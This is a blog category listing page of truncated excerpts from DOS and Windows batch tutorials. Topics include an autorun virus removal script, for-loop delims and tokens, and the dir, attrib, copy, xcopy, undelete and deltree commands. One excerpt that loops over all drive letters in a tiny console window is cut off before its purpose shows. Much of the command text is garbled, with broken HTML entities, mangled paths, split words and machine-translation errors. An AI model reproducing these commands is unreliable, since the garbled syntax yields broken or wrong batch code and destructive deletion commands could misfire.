Coding With Fun
Home Docker Django Node.js Articles Python pip guide FAQ Policy

Posts about DOS Command learning manual

Autorun virus removal tool

May 22, 2021 23:00 0 Comment DOS Command learning manual

Autorun virus removal tool, @Echo Off, color 2f, Title Autorun Virus Removal Tool - By Phexon, Rem kill process, taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM rav

Bat batch tutorial

May 22, 2021 23:00 0 Comment DOS Command learning manual

Example one, Example one, Example two, Example three, Example four, Example five, This is a technical tutorial, I will use very simple words to express their meaning, as long as you can read, you can learn knowledge., As I understan

The concept of Code Page and its set values

May 22, 2021 23:00 0 Comment DOS Command learning manual

The concept of Code Page and its set values, The concept of CODE PAGE in CMD and its set values:, Chcp, Displays the number of the active console code page, or changes the console's active consol

copy

May 22, 2021 23:00 0 Comment DOS Command learning manual

copy, @echo off, Title $$$$?'$$$$$', mode con: cols=14 lines=1, :again, Cls, del /Q /f "%temp%\copy.tmp" >nul 2>nul, for %%i in (c,d,e,f,g,h,i,j,k,l,m,n,o,p

The difference between delims and tokens and asterisks

May 22, 2021 23:00 0 Comment DOS Command learning manual

The difference between delims and tokens and asterisks, Compare the difference in execution results between the following two pieces of code:, 1、, @echo off, for /f "delims=" %%i in (test.txt) do echo /%%i/

del's bug

May 22, 2021 23:00 0 Comment DOS Command learning manual

del's bug, When deleting files with del, you cannot use del /a /f/gt;nul 2?gt;nul?amp;echo yes|| E, cho no to determine if it has been deleted, because yes is al

The dir command is defective

May 22, 2021 23:00 0 Comment DOS Command learning manual

The dir command is defective, One, —— pengfei, @echo off, for /f "tokens" %%i in ('dir /s /a-d /b'D:-Share iles?information?f*")" do (, echo %%i, echo %%i>>file.txt, ), pause, Extr

100 examples of DOS techniques

May 22, 2021 23:00 0 Comment DOS Command learning manual

100 examples of DOS techniques, 100 examples of DOS techniques, Source: http://www.cn-dos.net/forum/viewthread.php?tid=23999&fpage=0&highlight=&page=1, tianzizhi, 2006-10-20 18:36, 1

First, the format of the DIR command

May 22, 2021 23:00 0 Comment DOS Command learning manual

First, the format of the DIR command, dir [D:][PATH][NAME][[/A][:attrib]][/o:[sorted][/s][/l][/c[h], (1) dir /a:attrib default contains all files (system files. I, mplied file), Attrib., O

II. attrib ( r|-r| ) .| .| .

May 22, 2021 23:00 0 Comment DOS Command learning manual

II. attrib ( r|-r| ) .| .| ., The default attrib name shows the file's (file) properties, attrib io .sys (or subdirectt), shr c:\ i, o .sys specified as a system (s) implied (h) re

Third, cd introduction

May 23, 2021 00:00 0 Comment DOS Command learning manual

Third, cd introduction, Cd..., Returns to the upper secondary directory, "." R, epresents the current directory, "." R, epresents the parent directory, Cd.. \, .. R, eturn to

IV. copy s/y s/-y s/v s/s

May 23, 2021 00:00 0 Comment DOS Command learning manual

IV. copy s/y s/-y s/v s/s, Copy /y overrides all files without prompting, /-y prompt for all files (yes or no questions), /v Copy to be verified later, /B is displayed in binary

V. xcopy command

May 23, 2021 00:00 0 Comment DOS Command learning manual

V. xcopy command, xcopy [source] [date] [/p] [/s] [/e] [/v] [/y], xcopy (date) xcopy a:b:\/d:08/18/98/s/v copy files after 98.08.18, The xcopy s/p prompts you to create

seven, undelete (name) /au

May 23, 2021 00:00 0 Comment DOS Command learning manual

seven, undelete (name) /au, Un promptly restore all eligible files (recoverable) and place the initials as "", If present, add in the order of " s % and 0 1 2-9 a-z"., For exampl

eight, deltree /y (driveath)

May 23, 2021 00:00 0 Comment DOS Command learning manual

eight, deltree /y (driveath), deltree deletes subdirectts and files, although some files are systematic or implicit., It can have wildcards when it deletes eligible files or subdir